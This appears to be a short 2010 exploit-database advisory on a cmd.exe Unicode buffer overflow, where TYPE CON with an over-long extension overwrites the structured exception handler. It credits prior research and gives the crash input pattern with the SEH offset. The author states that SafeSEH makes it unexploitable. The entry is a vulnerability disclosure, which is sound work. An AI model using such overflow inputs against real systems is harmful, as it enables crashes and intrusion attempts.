37 lines
No EOL
1.1 KiB
Text
37 lines
No EOL
1.1 KiB
Text
# Exploit Title: cmd.exe Unicode Buffer Overflow (SEH)
|
|
# Date: 7/8/2010
|
|
# Author: bitform
|
|
# Software Link: N/A
|
|
# Version: N/A
|
|
# Tested on: Windows Server 2003 SP2 and Windows XP SP2
|
|
# CVE : none
|
|
|
|
1) Acknowledgements
|
|
|
|
Props to Dan Crowley (@dan_crowley) at Core Security Technologies
|
|
for doing the research on Windows File Pseudonyms and coming up
|
|
with the idea for this buffer overflow.
|
|
|
|
His presentation can be found here:
|
|
www.sourceconference.com/bos10pubs/windows%20file%20pseudonyms.pptx
|
|
|
|
2) Bug
|
|
|
|
The TYPE command in Windows is equivalent to cat in *nix. It simply
|
|
outputs the contents of a file to stdout. If you use TYPE in conjunction
|
|
with the device file CON, you can feed stdin into a file.
|
|
|
|
Example: TYPE CON > evil.txt
|
|
|
|
CON is also interpreted as a file so you can append an extension to
|
|
it. Supplying a overly large extension will overflow the structured
|
|
exception handler.
|
|
|
|
This buffer overflow is not exploitable since cmd.exe and it's DLLs
|
|
are all compiled with SafeSEH. Oh well. :D
|
|
|
|
3) Code
|
|
|
|
TYPE CON.<A * 626><B * 2><C * 2372>
|
|
|
|
Note: The two B's is where the SEH is overwritten. |